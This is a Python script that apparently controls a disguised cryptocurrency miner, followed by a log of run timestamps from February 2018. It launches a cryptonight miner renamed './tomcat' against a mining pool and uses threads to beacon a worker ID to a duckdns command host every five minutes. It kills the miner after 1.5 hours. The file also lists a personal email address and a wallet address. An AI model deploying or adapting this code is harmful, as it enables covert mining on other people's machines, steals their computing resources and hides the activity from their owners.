import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:11:01.462336
#2018-02-17 15:59:05.689921
#2018-02-17 17:47:01.995561
#2018-02-17 19:34:01.493144
#2018-02-17 21:23:03.530286
#2018-02-17 23:07:07.147278
#2018-02-18 00:54:07.407389
#2018-02-18 02:42:08.480047
#2018-02-18 04:31:07.536769
#2018-02-18 06:22:08.055313
#2018-02-18 08:12:07.611402
#2018-02-18 09:59:02.189234
#2018-02-18 11:46:01.863654
#2018-02-18 13:30:01.885989
#2018-02-18 15:19:05.683440
#2018-02-18 17:08:03.787867
#2018-02-18 18:56:06.312549
#2018-02-18 20:43:03.511190
#2018-02-18 22:28:07.266661
#2018-02-19 00:17:06.977849
#2018-02-19 02:03:07.895985
#2018-02-19 03:51:06.522488
#2018-02-19 05:36:05.568638
#2018-02-19 07:25:06.846506
#2018-02-19 09:15:10.236423
#2018-02-19 11:04:07.725200
#2018-02-19 12:51:04.193400
#2018-02-19 14:39:07.768106
#2018-02-19 16:28:06.894930
#2018-02-19 18:16:05.656274
#2018-02-19 20:02:06.250746
#2018-02-19 21:50:01.361109
#2018-02-19 23:36:04.415304
#2018-02-20 01:21:07.008361
#2018-02-20 03:11:01.955127
#2018-02-20 04:57:05.956005
#2018-02-20 06:39:01.426743
#2018-02-20 08:24:01.991728
#2018-02-20 10:09:08.961581
#2018-02-20 11:53:10.322663
#2018-02-20 13:40:11.049483
#2018-02-20 15:24:06.503730
#2018-02-20 17:09:06.449596
#2018-02-20 18:59:07.254882
#2018-02-20 20:49:07.479942
#2018-02-20 22:33:04.943362
#2018-02-21 00:15:07.010662
#2018-02-21 02:03:04.499889
#2018-02-21 03:51:05.418910
#2018-02-21 05:37:04.487774
#2018-02-21 07:25:07.936898
#2018-02-21 09:10:09.957753
#2018-02-21 10:59:09.348200
#2018-02-21 12:45:10.523710
#2018-02-21 14:32:09.390639
#2018-02-21 16:20:12.318205
#2018-02-21 18:11:02.229978
#2018-02-21 19:56:07.134278
#2018-02-21 21:43:07.232948
#2018-02-21 23:31:05.694158
#2018-02-22 01:19:01.344976
#2018-02-22 03:08:05.387727
#2018-02-22 04:52:06.269610
#2018-02-22 06:36:05.938655
#2018-02-22 08:24:08.133740
#2018-02-22 10:13:02.044678
#2018-02-22 11:57:10.116428
#2018-02-22 13:44:09.225330
#2018-02-22 15:34:01.309732
#2018-02-22 17:19:08.232373
#2018-02-22 19:07:06.319575
#2018-02-22 20:59:04.152578
#2018-02-22 22:44:06.956257
#2018-02-23 00:32:02.173633
#2018-02-23 02:17:04.627606
#2018-02-23 04:06:07.370018
#2018-02-23 05:52:01.751815
#2018-02-23 07:41:05.377699
#2018-02-23 09:46:09.182516
#2018-02-23 11:47:07.430925
#2018-02-23 13:37:04.567143
#2018-02-23 15:24:07.124164
#2018-02-23 17:14:06.913619
#2018-02-23 18:58:08.475376
#2018-02-23 20:46:05.311495
#2018-02-23 22:36:06.517377
#2018-02-24 00:22:02.028127
#2018-02-24 02:13:08.265281
#2018-02-24 04:03:04.655727
#2018-02-24 05:48:06.586486
#2018-02-24 07:38:07.612887
#2018-02-24 09:23:05.303832
#2018-02-24 11:17:05.695811
#2018-02-24 13:07:01.985307
#2018-02-24 14:55:06.690743
#2018-02-24 16:45:09.231468
#2018-02-24 18:33:06.083272
#2018-02-24 20:19:05.038246
#2018-02-24 22:13:04.962742
#2018-02-25 01:22:06.536113
#2018-02-25 05:17:06.042631
#2018-02-25 11:20:01.477306